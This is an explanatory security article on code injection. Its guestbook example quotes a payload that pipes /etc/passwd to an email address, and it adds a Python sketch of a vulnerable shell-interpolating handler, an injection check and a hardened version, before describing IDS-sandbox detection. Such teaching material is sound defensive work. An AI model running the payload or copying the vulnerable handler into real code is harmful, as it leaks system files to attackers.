A code injection attack is similar to an SQL injection attack. In this attack, an attacker places malicious code, such as shell commands or PHP scripts, into the input that an application sends to the server. When the server receives the request, it executes that code.
The main goal of this attack is to bypass or modify the original program in order to execute arbitrary code and gain access to restricted Web sites or databases, including those with personal information such as credit card numbers and passwords.
For example, suppose the server runs a “Guestbook” script to which users send short messages, such as:
This site is great!
An attacker could insert code into the Guestbook message, such as:
cat /etc/passwd | mail firstname.lastname@example.org
The server would execute this code and e-mail the password file to the attacker.
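The Guestbook scenario above, as an added example (not code from the article): a vulnerable handler beside a hardened one, plus a check that reports whether a message would change the command the shell actually runs. It assumes the vulnerable script passes "echo <message> >> guestbook.txt" to a shell (the article does not show the script) and models the shell's parsing with Python's shlex instead of invoking a shell, so the article's payload can be examined offline.

```python
import shlex

GUESTBOOK = "guestbook.txt"  # constructed sample path, not from the article

def vulnerable_command(message: str) -> str:
    """Command line the (assumed) vulnerable Guestbook script hands to /bin/sh.
    The message is interpolated verbatim, so shell syntax in it is interpreted."""
    return f"echo {message} >> {GUESTBOOK}"

def commands_shell_would_run(command_line: str) -> list[list[str]]:
    """Split a command line into the argv lists a POSIX shell would run.
    shlex with punctuation_chars models the shell lexer (|, ;, & become tokens);
    redirections are dropped so only the commands themselves remain."""
    lex = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    tokens = list(lex)
    commands, current, i = [], [], 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in ("|", "||", ";", "&", "&&"):
            if current:
                commands.append(current)
            current = []
        elif tok in ("<", ">", ">>"):
            i += 1  # skip the redirection target as well
        else:
            current.append(tok)
        i += 1
    if current:
        commands.append(current)
    return commands

def message_alters_command(message: str) -> bool:
    """Detection-style check: does the message change the command structure the
    template intends (exactly one echo command)?  Unbalanced quotes, which also
    change how the shell parses the line, count too."""
    try:
        cmds = commands_shell_would_run(vulnerable_command(message))
    except ValueError:  # shlex raises this for an unclosed quotation
        return True
    return not (len(cmds) == 1 and cmds[0][0] == "echo")

def hardened_command(message: str) -> tuple[list[str], bytes]:
    """Hardened form: a fixed argv list and no shell; the message travels only
    as stdin data, e.g. subprocess.run(argv, input=data, check=True)."""
    return ["tee", "-a", GUESTBOOK], (message + "\n").encode()
```

With the benign message the shell sees a single echo command; with the article's payload it sees two commands, the second of them attacker-chosen, while the hardened form keeps the same text as inert bytes.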
Investigating Code Injection Attacks
One way to detect code injection attacks combines an intrusion detection system (IDS) with a set of sandboxed execution environments provided by the OS. When the IDS finds what looks like a series of executable instructions in the network traffic, it hands the suspicious packets’ payload to the execution environment that matches the packets’ destination; the right environment is chosen from the destination IP address of the incoming packets. The payload is then executed in that monitored environment, and a report of the payload’s OS resource usage is returned to the IDS. If the report shows evidence of OS resource usage, the IDS alerts the user that the incoming packet contains malicious data.
Published on Mon 02 March 2015 by Hatty Jenkins in Security with tag(s): code injection